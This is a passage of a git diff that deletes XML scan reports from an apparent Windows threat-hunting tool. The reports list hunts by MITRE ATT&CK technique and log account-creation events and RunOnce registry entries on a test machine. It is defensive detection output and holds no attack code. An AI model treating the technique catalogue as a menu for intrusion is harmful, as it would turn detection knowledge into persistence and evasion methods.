-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:51.5028593Z'/&gt;&lt;EventRecordID&gt;4069&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Frances&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1004&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Frances&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Frances</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4063</recordid>
-            <time>2020-06-11 22:04:51.421513200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:51.4215132Z'/&gt;&lt;EventRecordID&gt;4063&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Christian&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1003&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Christian&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Christian</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4057</recordid>
-            <time>2020-06-11 22:04:51.316709000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:51.3167090Z'/&gt;&lt;EventRecordID&gt;4057&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Robert&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1002&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Robert&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Robert</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="1" datasources="16" tactics="12" time="132367112132820000" datetime="2020-06-15 16:13:33.28200Z">
-        <name>T1138 - Application Shimming</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="1" datasources="16" tactics="12" time="132367112132820000" datetime="2020-06-15 16:13:33.28200Z">
-        <name>T1182 - AppCert DLLs</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="1" datasources="16" tactics="12" time="132367112132970000" datetime="2020-06-15 16:13:33.29700Z">
-        <name>T1183 - Image File Execution Options</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="4" datasources="40" tactics="16" time="132367112133130000" datetime="2020-06-15 16:13:33.31300Z">
-        <name>T1484 - Group Policy Modification</name>
-    </hunt>
-</bluespawn>
diff --git a/bluespawn-06-15-2020-1015-17.xml b/bluespawn-06-15-2020-1015-17.xml
deleted file mode 100644
index 6d889069..00000000
--- a/bluespawn-06-15-2020-1015-17.xml
+++ /dev/null
@@ -1,2503 +0,0 @@
-<bluespawn>
-    <hunt agressiveness="Cursory" categories="1" datasources="16" tactics="4" time="132367113178930000" datetime="2020-06-15 16:15:17.89300Z">
-        <name>T1004 - Winlogon Helper DLL</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="5" datasources="24" tactics="12" time="132367113179080000" datetime="2020-06-15 16:15:17.90800Z">
-        <name>T1013 - Port Monitors</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="5" datasources="24" tactics="12" time="132367113179860000" datetime="2020-06-15 16:15:17.98600Z">
-        <name>T1015 - Accessibility Features</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="5" datasources="17" tactics="4" time="132367113180530000" datetime="2020-06-15 16:15:18.5300Z">
-        <name>T1031 - Modify Existing Service</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="4" datasources="8" tactics="16" time="132367113184990000" datetime="2020-06-15 16:15:18.49900Z">
-        <name>T1036 - Masquerading</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="5" datasources="24" tactics="132" time="132367113185300000" datetime="2020-06-15 16:15:18.53000Z">
-        <name>T1037 - Logon Scripts</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="1" datasources="16" tactics="4" time="132367113185620000" datetime="2020-06-15 16:15:18.56200Z">
-        <name>T1060 - Registry Run Keys / Startup Folder</name>
-        <detection type="Registry">
-            <key>HKEY_USERS\S-1-5-21-4235200151-4210980811-2443358387-1203\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce</key>
-            <value>Delete Cached Update Binary</value>
-            <data>C:\WINDOWS\system32\cmd.exe /q /c del /q "C:\Users\allowlist\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe"</data>
-        </detection>
-        <detection type="Registry">
-            <key>HKEY_USERS\S-1-5-21-4235200151-4210980811-2443358387-1203\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce</key>
-            <value>Delete Cached Standalone Update Binary</value>
-            <data>C:\WINDOWS\system32\cmd.exe /q /c del /q "C:\Users\allowlist\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe"</data>
-        </detection>
-        <detection type="Registry">
-            <key>HKEY_USERS\S-1-5-21-4235200151-4210980811-2443358387-1203\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce</key>
-            <value>Delete Cached Update Binary</value>
-            <data>C:\WINDOWS\system32\cmd.exe /q /c del /q "C:\Users\allowlist\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe"</data>
-        </detection>
-        <detection type="Registry">
-            <key>HKEY_USERS\S-1-5-21-4235200151-4210980811-2443358387-1203\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce</key>
-            <value>Delete Cached Standalone Update Binary</value>
-            <data>C:\WINDOWS\system32\cmd.exe /q /c del /q "C:\Users\allowlist\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe"</data>
-        </detection>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="5" datasources="24" tactics="8" time="132367113199300000" datetime="2020-06-15 16:15:19.93000Z">
-        <name>T1068 - Exploitation for Privilege Escalation</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="9" datasources="16" tactics="16" time="132367113200390000" datetime="2020-06-15 16:15:20.3900Z">
-        <name>T1089 - Disabling Security Tools</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="4" datasources="8" tactics="12" time="132367113200390000" datetime="2020-06-15 16:15:20.3900Z">
-        <name>T1100 - Web Shells</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="1" datasources="16" tactics="4" time="132367113200550000" datetime="2020-06-15 16:15:20.5500Z">
-        <name>T1101 - Security Support Provider</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="5" datasources="16" tactics="12" time="132367113200700000" datetime="2020-06-15 16:15:20.7000Z">
-        <name>T1103 - AppInit DLLs</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="5" datasources="24" tactics="4" time="132367113200700000" datetime="2020-06-15 16:15:20.7000Z">
-        <name>T1128 - Netsh Helper DLL</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="1" datasources="16" tactics="4" time="132367113202320000" datetime="2020-06-15 16:15:20.23200Z">
-        <name>T1131 - Authentication Package</name>
-    </hunt>
-    <hunt agressiveness="Cursory" categories="1" datasources="64" tactics="4" time="132367113202950000" datetime="2020-06-15 16:15:20.29500Z">
-        <name>T1136 - Account Created</name>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>8121</recordid>
-            <time>2020-06-12 19:06:42.634449000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-12T19:06:42.6344490Z'/&gt;&lt;EventRecordID&gt;8121&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d35d86c8-40e0-0001-8987-5dd3e040d601}'/&gt;&lt;Execution ProcessID='724' ThreadID='9480'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;allowlist&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1203&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1a01b&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;allowlist&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>allowlist</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>7988</recordid>
-            <time>2020-06-12 19:02:51.179322700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-12T19:02:51.1793227Z'/&gt;&lt;EventRecordID&gt;7988&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d35d86c8-40e0-0001-8987-5dd3e040d601}'/&gt;&lt;Execution ProcessID='724' ThreadID='9436'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;stran&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1202&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1a01b&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;stran&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>stran</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>7979</recordid>
-            <time>2020-06-12 19:02:51.94207200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-12T19:02:51.0942072Z'/&gt;&lt;EventRecordID&gt;7979&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d35d86c8-40e0-0001-8987-5dd3e040d601}'/&gt;&lt;Execution ProcessID='724' ThreadID='9436'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;spurr&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1201&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1a01b&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;spurr&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>spurr</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5245</recordid>
-            <time>2020-06-11 22:05:10.325695500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:10.3256955Z'/&gt;&lt;EventRecordID&gt;5245&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Kevin&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1200&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Kevin&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Kevin</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5239</recordid>
-            <time>2020-06-11 22:05:10.98439200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:10.0984392Z'/&gt;&lt;EventRecordID&gt;5239&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Lisa&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1199&lt;/Data&gt;&lt;Data 